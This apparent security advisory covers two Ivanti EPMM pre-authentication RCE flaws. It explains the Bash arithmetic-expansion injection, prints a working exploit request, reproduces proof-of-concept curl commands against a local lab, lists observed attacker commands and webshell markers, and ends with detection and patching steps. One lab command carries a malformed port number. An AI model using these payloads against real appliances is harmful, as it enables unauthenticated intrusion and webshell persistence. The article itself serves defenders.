Two critical zero-day flaws in Ivanti Endpoint Manager Mobile (EPMM) — tracked as CVE-2026-1281 and CVE-2026-1340 — are being mass-exploited in the wild. Both carry a CVSS score of 9.8 (Critical) and allow unauthenticated remote code execution against internet-facing appliances. Ivanti disclosed the bugs on January 29, 2026 with emergency mitigation guidance, and Germany's Federal Office for Information Security (BSI) followed with a public alert urging operators to mitigate and to run updated compromise-assessment scripts. Treat any unpatched EPMM appliance as a candidate for active compromise.
Why this matters
EPMM is a widely deployed mobile device management (MDM) platform that frequently sits at the network edge, making it an attractive pivot point into enterprise environments. Because exploitation requires no authentication and the path is trivial to trigger, the barrier to entry is essentially "network reachability." Within days of disclosure, multiple independent threat actors and botnets had folded the exploit into their tooling, producing enough background noise to make attribution difficult.
How the vulnerabilities work
Both CVE-2026-1281 and CVE-2026-1340 are pre-authentication remote command execution issues caused by unsafe handling of attacker-controlled input inside server-side Bash scripts. An internet-exposed EPMM web endpoint passes part of an incoming HTTP request into a shell script, and because of how Bash evaluates that input, the data ends up interpreted and executed as shell commands.
Two scripts sit at the center of the exploitation:
/mi/bin/map-appstore-url/mi/bin/map-aft-store-url
They are invoked when an HTTP request matches the following endpoint pattern:
/mifs/c/appstore/fob/3/<int>/sha256:<something1>/<something2>.ipa
A working exploit request looks like this:
/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue,et=1337133713,h=gPath[`sleep 5`]/e2327851-1e09-4463-9b5a-b524bc71fc07.ipa
The st parameter is crafted to match the name of an existing variable in the Bash script. Later in execution, the value of theValue gets evaluated as a Bash expression. In the example, gPath[sleep 5] forces Bash to run the inner command sleep 5 while trying to compute an array index. Swap sleep 5 for any attacker command and you have arbitrary execution — with no authentication required at any point.
The Bash arithmetic-expansion trigger
A public proof-of-concept (YunfeiGE18/CVE-2026-1281-CVE-2026-1340-Ivanti-EPMM-RCE) details the exact mechanism, which abuses Bash arithmetic-expansion behavior. When a variable that references another variable is used in an arithmetic context, and that referenced variable contains an array index with command substitution, the inner command runs:
- The request carries
st=theValue(the literal stringtheValuewith padding). - The request carries
h=gPath[command](the attacker command embedded in an array index). - The script parses
key=valuepairs in a loop, reassigningtheValueon each iteration;gStartTimeis set to the literal stringtheValue. - After the loop,
theValueholdsgPath[command]. - When
[[ ${currentTime} -gt ${gStartTime} ]]is evaluated,${gStartTime}resolves to the stringtheValue. In arithmetic context Bash treatstheValueas a variable reference, expands it togPath[command], and the array index triggers command substitution — resulting in RCE.
Proof of concept
The PoC ships a Docker-based lab that reproduces the pre-auth RCE for research purposes. Build and start it:
# Build and start the container
docker-compose up --build -d
# Check it's running
curl http://localhost:8180/health
Prove command execution by writing a file via the injection:
# URL-encoded payload: id > /mi/poc
curl "http://localhost:8180/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60id%20%3E%20/mi/poc%60%5D/test.ipa"
# Check if file was created
cat artifacts/poc
Confirm blind execution with a timing-based check — the request should hang for roughly five seconds:
# Should take ~5 seconds to respond
time curl "http://localhost:81080/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue%20%20,et=1337133713,h=gPath%5B%60sleep%205%60%5D/test.ipa"
Observed attacker behavior
Across multiple incident-response engagements, investigators have seen consistent activity against the vulnerable endpoints. Early requests typically aim to validate RCE, with commands injected straight into GET parameters. Frequently observed commands include:
id,whoami, andhostname— basic environment fingerprintingpasswdandps— credential and process enumerationwget— payload retrieval and stagingecho-based output redirection — confirming command outputsleepandtrue— timing and control for blind-injection confirmationrm— cleanup of temporary artifacts
In a number of cases, command output was redirected into web-accessible files beneath the Tomcat webroot — a far stronger signal of real code execution than passive scanning:
/mi/.../webapps/mifs/403.jsp/mi/.../webapps/mifs/401.jsp/mi/.../webapps/mifs/css/*.css
Attackers were also seen using DNS out-of-band (OAST) callbacks, firing repeated dig lookups against attacker-controlled domains at short intervals to confirm execution where direct HTTP responses might be filtered.
Webshell deployment
The most concerning post-exploitation behavior was the planting of JSP webshells inside Tomcat web application directories. Responders repeatedly found the marker string:
class U extends ClassLoader
This is characteristic of an in-memory Java classloader webshell that loads malicious classes at runtime to avoid touching disk. Notably, attackers often checked for an existing webshell before dropping their own — a sign of coordinated or experienced operators doing reconnaissance before establishing persistence.
Detection and mitigation
Organizations running Ivanti EPMM should act now:
- Patch immediately. Apply Ivanti's emergency updates released alongside the January 29, 2026 disclosure.
- Run BSI's updated detection scripts and review published IOCs to determine whether exploitation occurred.
- Audit the Tomcat webroot for unexpected JSP files or modified CSS files that may hide webshell artifacts.
- Review HTTP access logs for requests matching the
/mifs/c/appstore/fob/3/pattern with anomalous parameter values. - Monitor DNS logs for unexpected outbound lookups from EPMM appliances, which can indicate OAST-style callbacks.
- Isolate suspected appliances from the wider network and engage incident response before attempting remediation.
Bottom line
CVE-2026-1281 and CVE-2026-1340 combine a trivial pre-authentication exploit path, rapid weaponization across many actors, and confirmed in-memory webshell persistence — making them one of the most pressing enterprise vulnerability events of early 2026. Any organization that has not patched, assessed for compromise, or isolated affected EPMM appliances should treat this as a live incident-response priority.
References: NVD — CVE-2026-1281 · CVE Record — CVE-2026-1281 · PoC: YunfeiGE18/CVE-2026-1281-CVE-2026-1340-Ivanti-EPMM-RCE